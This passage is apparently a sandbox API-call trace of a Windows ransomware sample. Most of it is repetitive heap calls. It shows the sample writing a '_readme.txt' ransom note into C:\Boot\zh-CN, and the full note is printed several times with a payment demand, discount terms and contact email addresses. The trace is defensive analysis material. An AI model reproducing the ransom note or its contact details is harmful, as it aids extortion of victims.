(HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.723] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0228.723] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.723] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.723] PathFindFileNameW (pszPath="") returned="" [0228.723] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.724] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.724] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.724] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.724] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0228.725] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0228.725] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.725] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.725] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.725] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.726] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.726] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.726] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.726] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.726] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 